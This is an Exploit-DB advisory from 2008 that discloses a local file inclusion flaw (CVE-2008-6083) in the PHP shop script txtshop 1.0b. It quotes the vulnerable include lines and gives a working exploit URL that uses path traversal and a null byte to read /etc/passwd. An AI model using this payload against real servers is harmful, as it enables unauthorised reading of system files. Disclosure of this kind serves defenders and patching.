txtshop 1.0b language Local File Inclusion Vulnerability win only

2008-10-23T00:00:00
ID EDB-ID:6816
Type exploitdb
Reporter Pepelux
Modified 2008-10-23T00:00:00

Description

txtshop 1.0b (language) Local File Inclusion Vulnerability (win only). CVE-2008-6083. Webapps exploit for php platform

                                        
                                            -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
txtshop - beta 1.0 / Local File Inclusion Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$ Program: txtshop
$ Version: <= 1.0
$ File affected: ADMIN/header.php
$ Download: http://sourceforge.net/projects/txtshop/


Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org


--Bug --

4.	if (!$language)$language="ch";
5.	include_once("../lib/lang.".$language.".php");



-- Exploit --

http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00

# milw0rm.com [2008-10-23]